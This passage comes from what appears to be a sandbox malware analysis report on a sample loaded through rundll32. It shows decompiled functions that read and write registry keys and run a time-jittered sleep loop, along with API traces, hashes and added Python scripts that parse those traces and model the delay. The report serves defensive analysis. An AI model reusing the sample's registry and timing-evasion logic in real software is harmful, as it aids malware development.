                                            									if(_t38 != 0) {
                                            										 *_t38 = _a4; // and its size, if a size out-pointer was supplied
                                            									}
                                            								}
                                            							}
                                            						}
                                            						RegCloseKey(_a12); // executed
                                            					}
                                            					L12:
                                            					return _t43;
                                            				}
                                            				_t43 = E049F7849(_a4, _a8, _a12, _a16, _a20, _a24); // alternate lookup taken when _a4 != 0 (its subcall trace below shows SafeArrayDestroy)
                                            				if(_t43 == 0) {
                                            					goto L12;
                                            				}
                                            				goto L2; // otherwise fall back to the direct registry read
                                            			}

                                            Instruction addresses for the listing above (per-line alignment lost in this rendering): 0x049f4e17 to 0x049f4ec8

                                            APIs
                                            • RegOpenKeyW.ADVAPI32(80000002,04F79EC2,04F79EC2), ref: 049F4E44
                                            • RegQueryValueExW.KERNEL32(04F79EC2,?,00000000,80000002,00000000,00000000,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2,80000002), ref: 049F4E66
                                            • RegQueryValueExW.ADVAPI32(04F79EC2,?,00000000,80000002,00000000,00000000,00000000,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2), ref: 049F4E8B
                                            • RegCloseKey.KERNEL32(04F79EC2,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2,80000002,00000000,?), ref: 049F4EBB
                                              • Part of subcall function 049F7849: SafeArrayDestroy.OLEAUT32(00000000), ref: 049F78D1
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                            • String ID:
                                            • API String ID: 486277218-0
                                            • Opcode ID: c1276ed5399577f3308283e68a62124260c6e0dfe3960670c603863088152179
                                            • Instruction ID: 56defddd23033a89da71b96172eae94f6c387636300e4f8f27510d80c0ac58e0
                                            • Opcode Fuzzy Hash: c1276ed5399577f3308283e68a62124260c6e0dfe3960670c603863088152179
                                            • Instruction Fuzzy Hash: F121397350011ABFDF11AE94DD848EF7BADFB18250B058435FF1596220D631AD609B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%
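The "APIs" listings in these records carry the facts an analyst usually wants from a function (which hive a RegOpenKey targets, which calls belong to the function itself and which were traced inside a subcall, the call-site address). The following is an added example for working with that format and is not Joe Sandbox's own code; the line grammar is inferred from the listings on this page, and the sample input is copied from the E049F4E0B record above. The registry root handles (0x80000001 HKEY_CURRENT_USER, 0x80000002 HKEY_LOCAL_MACHINE, 0x80000003 HKEY_USERS) are the documented winreg.h constants.

```python
"""Parser for the "APIs" listing of a Joe Sandbox function record.

Added example for this report; it is not Joe Sandbox's own code. The line
format is inferred from the listings on this page:

    • Api.MODULE(arg1,arg2,...), ref: ADDR
      • Part of subcall function FUNC: Api.MODULE(...), ref: ADDR
    • Api.MODULE ref: ADDR            (no argument list recorded)

Arguments are hexadecimal as printed; "?" marks a value the tracer could
not resolve.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: five lines copied from the E049F4E0B record above.
SAMPLE_LISTING = """\
• RegOpenKeyW.ADVAPI32(80000002,04F79EC2,04F79EC2), ref: 049F4E44
• RegQueryValueExW.KERNEL32(04F79EC2,?,00000000,80000002,00000000,00000000,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2,80000002), ref: 049F4E66
• RegCloseKey.KERNEL32(04F79EC2,?,049F6EFF,3D049F90,80000002,049F2A82,00000000,049F2A82,?,04F79EC2,80000002,00000000,?), ref: 049F4EBB
  • Part of subcall function 049F7849: SafeArrayDestroy.OLEAUT32(00000000), ref: 049F78D1
  • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
"""

LINE_RE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

# Predefined registry root handles (winreg.h); the first argument of RegOpenKey*.
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]         # None where the tracer printed "?"
    ref: Optional[int]                # call-site address
    subcall_of: Optional[int] = None  # function address for "Part of subcall" lines


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    if not text or not text.strip():
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in text.split(",")]


def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised listing line: {line!r}")
        calls.append(ApiCall(
            api=m["api"],
            module=m["module"].upper(),
            args=parse_args(m["args"]),
            ref=int(m["ref"], 16) if m["ref"] else None,
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls made by the function itself, excluding those attributed to subcalls."""
    return [c for c in calls if c.subcall_of is None]


def registry_hives(calls: List[ApiCall]) -> List[str]:
    """Hive names passed as the first argument of RegOpenKey*/RegCreateKey*."""
    found = set()
    for c in calls:
        if c.api.startswith(("RegOpenKey", "RegCreateKey")) and c.args and c.args[0] in HIVES:
            found.add(HIVES[c.args[0]])
    return sorted(found)


def apis_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Module -> sorted API names, the same grouping the report's 'API ID' line summarises."""
    out: Dict[str, set] = defaultdict(set)
    for c in calls:
        out[c.module].add(c.api)
    return {mod: sorted(apis) for mod, apis in out.items()}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for c in parsed:
        print(c)
    print("hives:", registry_hives(parsed))
    print("modules:", apis_by_module(parsed))
```

Run over a whole report the hive summary is a quick way to see whether a sample touches HKEY_LOCAL_MACHINE (as E049F4E0B does) or only the user hive, and the direct/subcall split stops a RtlFreeHeap traced inside a helper from being attributed to the caller.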

                                            APIs
                                            • RegQueryValueExA.KERNEL32(05816085,?,00000000,05816085,00000000,05816095,05816085,?,?,?,?,058162F4,80000001,?,05816085,05816095), ref: 0581EFA0
                                            • RtlAllocateHeap.NTDLL(00000000,05816095,00000000), ref: 0581EFB7
                                            • HeapFree.KERNEL32(00000000,00000000,?,058162F4,80000001,?,05816085,05816095,?,0581CC7F,80000001,?,05816085), ref: 0581EFD2
                                            • RegQueryValueExA.KERNEL32(05816085,?,00000000,05816085,00000000,05816095,?,058162F4,80000001,?,05816085,05816095,?,0581CC7F,80000001), ref: 0581EFF1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateFree
                                            • String ID:
                                            • API String ID: 4267586637-0
                                            • Opcode ID: 65add16a69b552603371efbc2a908f7ebf188b0f59ee8fc27c4cc69405934e09
                                            • Instruction ID: 1af5d2722bf304c561bf4fba1add9ae57b6dade4b5d06cd560d83fe1e32d87a0
                                            • Opcode Fuzzy Hash: 65add16a69b552603371efbc2a908f7ebf188b0f59ee8fc27c4cc69405934e09
                                            • Instruction Fuzzy Hash: F51128B6500118BFDB229F95DC85CEEBFBDFB88660B1040A6FD05A7110D6716E40DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E049F39B5(void* __ecx, intOrPtr _a4) {
                                            				struct _FILETIME _v12;
                                            				int _t13;
                                            				signed int _t16;
                                            				void* _t18;
                                            				signed int _t19;
                                            				unsigned int _t23;
                                            				void* _t30;
                                            				signed int _t34;
                                            
                                            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                            				asm("stosd");
                                            				do {
                                            					_t13 = SwitchToThread(); // 1 if another thread was scheduled, 0 otherwise
                                            					GetSystemTimeAsFileTime( &_v12);
                                            					_t23 = _v12.dwHighDateTime;
                                            					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5; // low half of the 64-bit FILETIME >> 5
                                            					_push(0);
                                            					_push(0x13);
                                            					_push(_t23 >> 5);
                                            					_push(_t16);
                                            					L049F8326(); // _aullrem: (FILETIME >> 5) % 0x13; the remainder comes back in EAX, which the decompiler keeps calling _t16
                                            					_t34 = _t16 + _t13; // remainder (0..18) + SwitchToThread result
                                            					_t18 = E049F54D5(_a4, _t34);
                                            					_t30 = _t18;
                                            					_t19 = 3;
                                            					Sleep(_t19 << (_t34 & 0x00000007)); // executed; 3 ms shifted by a time-derived 0..7, i.e. 3 to 384 ms
                                            				} while (_t30 == 1); // retry while the callee reports 1
                                            				return _t30;
                                            			}

                                            Instruction addresses for the listing above (per-line alignment lost in this rendering): 0x049f39ba to 0x049f3a1a

                                            APIs
                                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,049F3D61,?,?), ref: 049F39C6
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,049F3D61,?,?), ref: 049F39D2
                                            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 049F39EB
                                              • Part of subcall function 049F54D5: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 049F5534
                                            • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,049F3D61,?,?), ref: 049F3A0A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                            • String ID:
                                            • API String ID: 1610602887-0
                                            • Opcode ID: b57ad07f52ecc9a4a122b7c8385980cfd84bb2d0d2835d6ce4ed3f19fbee6d3e
                                            • Instruction ID: bab9892d1a58fbf05e6a0a16ff98709d604ded827252c9e57aa36815f1bcb645
                                            • Opcode Fuzzy Hash: b57ad07f52ecc9a4a122b7c8385980cfd84bb2d0d2835d6ce4ed3f19fbee6d3e
                                            • Instruction Fuzzy Hash: D0F0A4B3A002147BD7149BA4DC1DFDE7AB9DBC4365F150134FA02E7240E6B8AA008B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%
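The decompiler output for E049F39B5 obscures how the sleep length is chosen: the four `_push` calls are the argument setup for the 64-bit CRT remainder helper, and the value added to the SwitchToThread result is that remainder, not the shifted FILETIME. The model below is an added example for this report, not code from the sample or from Joe Sandbox. It assumes that L049F8326 is MSVC's `_aullrem` (unsigned 64-bit remainder, arguments pushed as dividend low, dividend high, divisor low, divisor high), that its EAX result is what `_t16 + _t13` consumes, and that E049F54D5 returns 1 to request another iteration, as the `while (_t30 == 1)` condition shows. The `Sleep.KERNEL32(00000003, ...)` call captured above corresponds to a shift of 0 in this model.

```python
"""Model of the time-derived retry delay in E049F39B5.

Added example for this report, not code from the sample or from Joe
Sandbox. Assumptions: L049F8326 is the MSVC CRT helper _aullrem
(unsigned 64-bit remainder; pushes are dividend low, dividend high,
divisor low, divisor high), its EAX result is what the decompiled
`_t16 + _t13` consumes, SwitchToThread() contributes 0 or 1, and
E049F54D5 returns 1 to ask for another iteration.
"""
from datetime import datetime, timezone
from typing import Callable, List, Tuple

# Offset between the FILETIME epoch (1601-01-01) and the Unix epoch, in 100 ns units.
EPOCH_DIFF_100NS = 116444736000000000
MODULUS = 0x13  # divisor pushed to _aullrem


def filetime_from_unix_seconds(seconds: float) -> int:
    """64-bit FILETIME (100 ns intervals since 1601-01-01 UTC) for a Unix timestamp."""
    return int(seconds * 10_000_000) + EPOCH_DIFF_100NS


def to_filetime(dt: datetime) -> int:
    """FILETIME as GetSystemTimeAsFileTime would return it for an aware datetime."""
    return filetime_from_unix_seconds(dt.timestamp())


def iteration_seed(filetime: int, yielded: bool) -> int:
    """_t34 = _aullrem(filetime >> 5, 0x13) + SwitchToThread()."""
    filetime &= 0xFFFFFFFFFFFFFFFF
    remainder = (filetime >> 5) % MODULUS                     # 0..18
    return (remainder + (1 if yielded else 0)) & 0xFFFFFFFF   # 0..19


def retry_delay_ms(filetime: int, yielded: bool) -> int:
    """Sleep argument of one iteration: 3 << (_t34 & 7)."""
    return 3 << (iteration_seed(filetime, yielded) & 7)


def possible_delays_ms() -> List[int]:
    """Every value Sleep() can receive from this loop."""
    return sorted({3 << s for s in range(8)})


def simulate(clock: Callable[[], int], work: Callable[[int], int],
             yielded: bool = False, max_iter: int = 10_000) -> Tuple[int, int, int]:
    """Run the loop as decompiled; return (total sleep ms, iterations, last result of work).

    `clock` stands in for GetSystemTimeAsFileTime and `work` for E049F54D5;
    max_iter is a safety bound the original loop does not have.
    """
    total_ms = 0
    iterations = 0
    while True:
        seed = iteration_seed(clock(), yielded)
        result = work(seed)            # E049F54D5(_a4, _t34)
        total_ms += 3 << (seed & 7)    # Sleep(3 << (_t34 & 7))
        iterations += 1
        if result != 1 or iterations >= max_iter:
            return total_ms, iterations, result


if __name__ == "__main__":
    # Constructed timestamp; any aware datetime works.
    ft = to_filetime(datetime(2022, 4, 27, 12, 0, 0, tzinfo=timezone.utc))
    print("seed", iteration_seed(ft, False), "delay ms", retry_delay_ms(ft, False))
    print("all possible delays", possible_delays_ms())
```

Because the FILETIME advances by one unit every 100 ns, the remainder is effectively unpredictable across iterations, so the loop's sleeps look like jitter in a trace; the bound of 384 ms per iteration is what makes the total delay depend on how long E049F54D5 keeps returning 1 rather than on the time source.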

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016C0
                                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016CB
                                            • _wcsupr.NTDLL ref: 058016D8
                                            • lstrlenW.KERNEL32(00000000), ref: 058016E0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                            • String ID:
                                            • API String ID: 2533608484-0
                                            • Opcode ID: 079a6fd0bc46212a42b174d0b0d3dcdd0ba10a16823f87beb117cd8daec9ef71
                                            • Instruction ID: 52f96a96b0d4385ef642b28a59fb5be983b83138f65bb02f53e3b27d2d8f89de
                                            • Opcode Fuzzy Hash: 079a6fd0bc46212a42b174d0b0d3dcdd0ba10a16823f87beb117cd8daec9ef71
                                            • Instruction Fuzzy Hash: B9F0B4326053106A97626A795CCDE7B9E5DFF80B727205128FD01D2194CE64DC41C6A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05819CFA
                                              • Part of subcall function 058123C2: RtlEnterCriticalSection.NTDLL(00000000), ref: 058123CE
                                              • Part of subcall function 058123C2: CloseHandle.KERNEL32(?), ref: 058123DC
                                              • Part of subcall function 058123C2: RtlLeaveCriticalSection.NTDLL(00000000), ref: 058123F8
                                            • FindCloseChangeNotification.KERNEL32(?), ref: 05819D08
                                            • InterlockedDecrement.KERNEL32(0582907C), ref: 05819D17
                                              • Part of subcall function 05813EC0: SetEvent.KERNEL32(00000598,05819D32), ref: 05813ECA
                                              • Part of subcall function 05813EC0: CloseHandle.KERNEL32(00000598), ref: 05813EDF
                                              • Part of subcall function 05813EC0: HeapDestroy.KERNELBASE(05980000), ref: 05813EEF
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05819D33
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
                                            • String ID:
                                            • API String ID: 2993087875-0
                                            • Opcode ID: 05360a8a08e7692c3228f91229e2bb51c8a34860e9092826a80e8e4ad0572b8a
                                            • Instruction ID: 48f7663360eb5d823a58a88733159ef04780b110e52e004866b02a2c0c34b78a
                                            • Opcode Fuzzy Hash: 05360a8a08e7692c3228f91229e2bb51c8a34860e9092826a80e8e4ad0572b8a
                                            • Instruction Fuzzy Hash: A9F0A974650214ABD7115B6A980AF793F7CEB41771F104205FD19C32D0DF749D818B66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 50%
                                            			E049F68F5(void** __esi) {
                                            				intOrPtr _v0;
                                            				intOrPtr _t4;
                                            				intOrPtr _t6;
                                            				void* _t8;
                                            				void* _t9;
                                            				intOrPtr _t10;
                                            				void* _t11;
                                            				void** _t13;
                                            
                                            				_t13 = __esi;
                                            				_t4 =  *0x49fa3cc; // 0x4f795b0
                                            				__imp__(_t4 + 0x40); // RtlEnterCriticalSection on the critical section at +0x40 of the global context
                                            				while(1) {
                                            					_t6 =  *0x49fa3cc; // 0x4f795b0
                                            					_t1 = _t6 + 0x58; // 0x0
                                            					if( *_t1 == 0) {
                                            						break;
                                            					}
                                            					Sleep(0xa); // poll every 10 ms until the flag at +0x58 clears
                                            				}
                                            				_t8 =  *_t13;
                                            				if(_t8 != 0 && _t8 != 0x49fa030) { // free the previous buffer unless it is the static one at 0x49fa030
                                            					HeapFree( *0x49fa2d8, 0, _t8);
                                            				}
                                            				_t9 = E049F4117(_v0, _t13); // executed
                                            				_t13[1] = _t9;
                                            				_t10 =  *0x49fa3cc; // 0x4f795b0
                                            				_t11 = _t10 + 0x40;
                                            				__imp__(_t11); // RtlLeaveCriticalSection
                                            				return _t11;
                                            			}

                                            Instruction addresses for the listing above (per-line alignment lost in this rendering): 0x049f68f5 to 0x049f6952

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F68FE
                                            • Sleep.KERNEL32(0000000A), ref: 049F6908
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F6930
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F694C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                            • String ID:
                                            • API String ID: 58946197-0
                                            • Opcode ID: 0e732edfc74dd151f435dd0b962073ce1bb2c3daea09901995302638d7c75607
                                            • Instruction ID: 462b070e2a5ba2c76a99a5f797a7e5575b266473b803f502bc094e7239274400
                                            • Opcode Fuzzy Hash: 0e732edfc74dd151f435dd0b962073ce1bb2c3daea09901995302638d7c75607
                                            • Instruction Fuzzy Hash: F9F0F8B0309341ABE7209F68DE49F163FE8EB50344B084434FA5AD6661D628EC91DB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F67E2(void* __edx) {
                                            				void* _v8;
                                            				int _v12;
                                            				WCHAR* _v16;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t23;
                                            				intOrPtr _t24;
                                            				void* _t26;
                                            				intOrPtr _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t38;
                                            				void* _t40;
                                            				intOrPtr _t42;
                                            				void* _t45;
                                            				void* _t50;
                                            				void* _t52;
                                            
                                            				_t50 = __edx;
                                            				_v12 = 0;
                                            				_t23 = E049F6955(0,  &_v8); // executed
                                            				if(_t23 != 0) {
                                            					_v8 = 0;
                                            				}
                                            				_t24 =  *0x49fa348; // 0x57d5a8
                                            				_t4 = _t24 + 0x49fbe30; // 0x4f793d8
                                            				_t5 = _t24 + 0x49fbdd8; // 0x4f0053
                                            				_t26 = E049F427E( &_v16, _v8, _t5, _t4); // executed
                                            				_t45 = _t26;
                                            				if(_t45 == 0) {
                                            					StrToIntExW(_v16, 0,  &_v12);
                                            					_t45 = 8;
                                            					if(_v12 < _t45) {
                                            						_t45 = 1;
                                            						__eflags = 1;
                                            					} else {
                                            						_t32 =  *0x49fa348; // 0x57d5a8
                                            						_t11 = _t32 + 0x49fbe24; // 0x4f793cc
                                            						_t48 = _t11;
                                            						_t12 = _t32 + 0x49fbdd8; // 0x4f0053
                                            						_t52 = E049F6203(_t11, _t12, _t11);
                                            						_t59 = _t52;
                                            						if(_t52 != 0) {
                                            							_t35 =  *0x49fa348; // 0x57d5a8
                                            							_t13 = _t35 + 0x49fbe6e; // 0x30314549
                                            							if(E049F13F8(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                            								_t61 =  *0x49fa2fc - 6;
                                            								if( *0x49fa2fc <= 6) {
                                            									_t42 =  *0x49fa348; // 0x57d5a8
                                            									_t15 = _t42 + 0x49fbdba; // 0x52384549
                                            									E049F13F8(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                            								}
                                            							}
                                            							_t38 =  *0x49fa348; // 0x57d5a8
                                            							_t17 = _t38 + 0x49fbe68; // 0x4f79410
                                            							_t18 = _t38 + 0x49fbe40; // 0x680043
                                            							_t40 = E049F3B76(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                            							_t45 = _t40;
                                            							HeapFree( *0x49fa2d8, 0, _t52);
                                            						}
                                            					}
                                            					HeapFree( *0x49fa2d8, 0, _v16);
                                            				}
                                            				_t54 = _v8;
                                            				if(_v8 != 0) {
                                            					E049F5147(_t54);
                                            				}
                                            				return _t45;
                                            			}

                                            APIs
                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F793D8,00000000,?,76CDF710,00000000,76CDF730), ref: 049F6831
                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F79410,?,00000000,30314549,00000014,004F0053,04F793CC), ref: 049F68CE
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6BB4), ref: 049F68E0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 3c497ebeea829fa4389cdb4ea1607e1884b593ae2dea100fd34c8e41e2b4e7eb
                                            • Instruction ID: 03ff2238e26680645c44a02315f17cc259f0660c6a94af7be120ac08b19ae8f4
                                            • Opcode Fuzzy Hash: 3c497ebeea829fa4389cdb4ea1607e1884b593ae2dea100fd34c8e41e2b4e7eb
                                            • Instruction Fuzzy Hash: 26316972A00218BFDB219B94DC88EDE7BBDEB48714F140079EA04AB121D7B1BE459B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581BAC0: RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                              • Part of subcall function 0581BAC0: lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,05828068,00000000,00000001,00000000,?,0582806E,00000000,?,?,?,?,00000000), ref: 05806BBE
                                            • RegSetValueExA.KERNEL32(05828068,00000003,00000000,00000003,05828068,00000028), ref: 05806BFF
                                            • RegCloseKey.ADVAPI32(?), ref: 05806C0B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value$CloseCreateQuerylstrlen
                                            • String ID:
                                            • API String ID: 2552977122-0
                                            • Opcode ID: 89b8e9721737856f667cb0a7beb97fbb77a5cb3629bf9e259bc7c707c92d3032
                                            • Instruction ID: 462589f578d362060c89e994c584531832bcffac9856f5c0bdfdb2c4d83bf63a
                                            • Opcode Fuzzy Hash: 89b8e9721737856f667cb0a7beb97fbb77a5cb3629bf9e259bc7c707c92d3032
                                            • Instruction Fuzzy Hash: 1D31F875910328AFEF61DB95DC499AEBFB8FB04750F108056ED04E2240DB706E84CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E049F250D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                            				char _v5;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				char _t28;
                                            				void* _t33;
                                            				void* _t38;
                                            				void* _t45;
                                            				char* _t46;
                                            				void* _t48;
                                            				char* _t56;
                                            				char* _t57;
                                            				intOrPtr _t59;
                                            				void* _t60;
                                            
                                            				_t56 = _a4;
                                            				_t60 = __eax;
                                            				_v12 = 0xb;
                                            				if(_t56 != 0 && __eax != 0) {
                                            					_t5 = _t60 - 1; // -1
                                            					_t46 =  &(_t56[_t5]);
                                            					_t28 =  *_t46;
                                            					_v5 = _t28;
                                            					 *_t46 = 0;
                                            					__imp__(_a8, _t45);
                                            					_v16 = _t28;
                                            					_t57 = StrStrA(_t56, _a8);
                                            					if(_t57 != 0) {
                                            						 *_t46 = _v5;
                                            						_t33 = RtlAllocateHeap( *0x49fa2d8, 0, _a16 + _t60); // executed
                                            						_t48 = _t33;
                                            						if(_t48 == 0) {
                                            							_v12 = 8;
                                            						} else {
                                            							_t58 = _t57 - _a4;
                                            							E049F799E(_t57 - _a4, _a4, _t48);
                                            							_t38 = E049F799E(_a16, _a12, _t58 + _t48);
                                            							_t53 = _v16;
                                            							_t59 = _a16;
                                            							E049F799E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                            							 *_a20 = _t48;
                                            							_v12 = _v12 & 0x00000000;
                                            							 *_a24 = _t60 - _v16 + _t59;
                                            						}
                                            					}
                                            				}
                                            				return _v12;
                                            			}

                                            APIs
                                            • lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 049F2541
                                            • StrStrA.SHLWAPI(00000000,?), ref: 049F254E
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 049F256D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
